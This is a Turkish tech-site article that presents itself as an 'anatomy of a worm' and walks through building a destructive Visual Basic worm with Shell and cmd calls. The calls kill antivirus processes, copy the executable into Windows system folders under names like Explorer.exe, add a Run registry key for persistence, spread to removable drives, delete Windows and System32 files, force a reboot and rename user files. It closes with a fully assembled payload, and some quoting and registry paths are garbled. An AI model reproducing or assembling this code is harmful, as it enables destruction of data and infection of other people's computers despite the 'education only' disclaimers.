Yazılım

Solucanlar nedir? Nasıl üretilyor?

Visual Basic programi ile nasil basit solucanların nasıl yazıldığını göreceksiniz.

Teknolojioku.com olarak sizlerle Visual Basic hackerların nasıl solucan yazdıklarını göstereceğiz Anlatacagimiz sadece Solucan virüsünün bir Anatomisidir. mantıını kavrayıp tamamen güvenlik almanız için yazılmıştır.
Visual Basic ile yazılan virüslerde öncelikle Silme,kopyalama,kayıt defterine ekle gibi kodlar kullanılıyor. Ama Antivirüsler bunu gördüğü için  solucanı yazanlar Virüslerini MS-DOS kodlarıyla yapıyrlar. Peki bunlar nasıl yapılıyor ?.Tabiki "Shell" komutuyla "Cmd" dosyasını çalıştırarak bunun üstesinden geliyorlar.

Örnek:

shell "cmd /c del /f /q /s %windir%\\\\\\\\*.*"
Yukarıda gördüğünüz en baştaki komut "Shell" yani çağırma komutu.Bununla "CMD" dosyasını çalıştırıp ms-dos komutları veriliyor. MS_DOS komutunda ise şu yazmakta."del /f /q /s %Windir% yani Windowsun içindeki herşeyi sil. Aşağıda bilgi vererek kısa kısa kodların da ne olduğunu tanıtalım.
Bir solucan öncelikle kendini engelleyen programları kapatmak ister. Bunlar Antivirüsler, güvenlik duvarları, firewall türevi programlar. Bunun için şu komutu kullanıyorlar.

shell "cmd /c taskkill /t /im Eset.exe"
Bunu forma yapıştırıp kaydettikten sonra "Görev yöneticisi"nde eset adında çalışan antivirüsü kapatmakta.

Ama hedefin bilgisayarında acaba hangi antivirüs var? Hackerlar bunun üstesinden de arama motorlarından bütün antivirüslerin listesini indiriyor.
On Error Resume Next Me.hide app.TaskVisible = False Visible = False shell "cmd /c taskkill /t /im Panda.exe" shell "cmd /c taskkill /t /im Tsk.exe" shell "cmd /c taskkill /t /im Sym.exe" shell "cmd /c taskkill /t /im Anti.exe" shell "cmd /c taskkill /t /im Egui.exe" 
gibi.

Sonraki aşamaları ise, solucan bütün antivirüsleri ve firewalları devre dışı bıraktıktan sonra yaptığı şey kendini sisteme kopyalamak ve kendini kayıt defterine eklemektir. Bunuda xCopy komutuyla yaptırıyorlar .Aşağıda kopyalama kodunda "VirüsAdı.exe" ile yazılan yere virüsün ismini yazıyorar. Örneğin bütün kodlar bittikten sonra virüsün ismine "Nuke" koyar iseler aynı şekilde bütün "Virüsadı.exe" kısımlarına virüsünüz adlarını yazıyorlar.

shell "cmd /c xcopy /u /y "VirüsAdı.exe" "%Windir%\\System\\Explorer.exe""shell "cmd /c xcopy /u /y "VirüsAdı.exe" "%Windir%\\System32\\Explorers.exe""
Evet.Yukarıda verilen kodları incelerseniz şunu görürsünüz. Hackerlerin yaptığı virüs kendini WINDOWS\\System ve System32 ye kopyalıyor. Bu sayede kendini windows ile birlikte başlatıyor ama aktif olmuyor. Bunun için kayıt defterine kendini ekleme özelliği ekliyorlar . Onu da şöyle yapmaktalar.

shell "cmd /c reg add hkey_local_machine\\software\\microsoft\\windowscurrentversionrun /v startAPI /t reg_sz /d %Windir%\\System\\VirusAdı.exe /f"shell "cmd /c reg add hkey_local_machine\\software\\microsoft\\windowscurrentversionrun /v startAPI /t reg_sz /d %Windir%\\System32\\VirusAdı.exe /f"

Yukarda yine "Shell" komutunu kullanarak virüslerini kayıt defterine ekliyorlar. Windows'un her açılışında virüs kendini aktif ediyor.

Bütün bunları yaptıktan sonra artık hackerlar virüslerini güvene alıyorlar. Saldırı kısmı şimdi başlıyor ; Tabi bunlar sadece işin nasıl döndüğünü öğrenmeniz için. Bilgi dışında kesinlikle kullanmayın.

Hackerların bundan sonra yaptıkları hayal güçlerini kuallanmak. Flash belleklerden virüsün bulaşmasını isterlerse, kendini Flaş belleklere kopyalaması için lazım olan kodu yani "xCopy"kodunu kullanıyorlar. Şöyle bir tasarlama yapıyorlar;

shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "D:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "E:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "G:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "H:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "I:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "L:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "C:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "J:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "K:\\Proces.exe"

shell "cmd /c ipconfig/release"shell "cmd /c del /f /q /s %Windir%\\*.*"shell "cmd /c shutdown -r -f -t 90"shell "cmd /c del /f /q /s %Windir%\\System32\\*.*"shell "cmd /c del /f /q /s %Windir%\\System\\*.*"msgbox "Dikkat Virus Var"msgbox "Sistem Hatasi"msgbox "Solucan Var"Shell "cmd /c REN *.DOC "Shell "cmd /c REN *.exe "Shell "cmd /c REN *.MP3 "Shell "cmd /c REN *.TXT "



On Error Resume Next Me.hide app.TaskVisible = False Visible = False shell "cmd /c taskkill /t /im Panda.exe" shell "cmd /c taskkill /t /im Tsk.exe" shell "cmd /c taskkill /t /im Sym.exe" shell "cmd /c taskkill /t /im Anti.exe" shell "cmd /c taskkill /t /im Egui.exe"
shell "cmd /c xcopy /u /y "VirüsAdı.exe" "%Windir%\\System\\Explorer.exe""shell "cmd /c xcopy /u /y "VirüsAdı.exe" "%Windir%\\System32\\Explorers.exe""
shell "cmd /c reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d %Windir%\\System\\VirusAdı.exe /f"shell "cmd /c reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d %Windir%\\System32\\VirusAdı.exe /f"
shell "cmd /c ipconfig/release"shell "cmd /c del /f /q /s %Windir%\\*.*"shell "cmd /c shutdown -r -f -t 90"shell "cmd /c del /f /q /s %Windir%\\System32\\*.*"shell "cmd /c del /f /q /s %Windir%\\System\\*.*"msgbox "Hacked by X"msgbox "Sisteminiz silindi"msgbox "Bilgisayarınız çökme aşamasında..."Shell "cmd /c REN *.DOC "Shell "cmd /c REN *.exe "Shell "cmd /c REN *.MP3 "Shell "cmd /c REN *.TXT "

İşte bunlar bir solucanın anatomisi. Bu kodlar sadece ve sadece eğitim içindir . Kesinlikle bir başkasında denemeyin.
Yorumlar
Veri politikasındaki amaçlarla sınırlı ve mevzuata uygun şekilde çerez konumlandırmaktayız. Detaylar için çerez politikamızı inceleyebilirsiniz.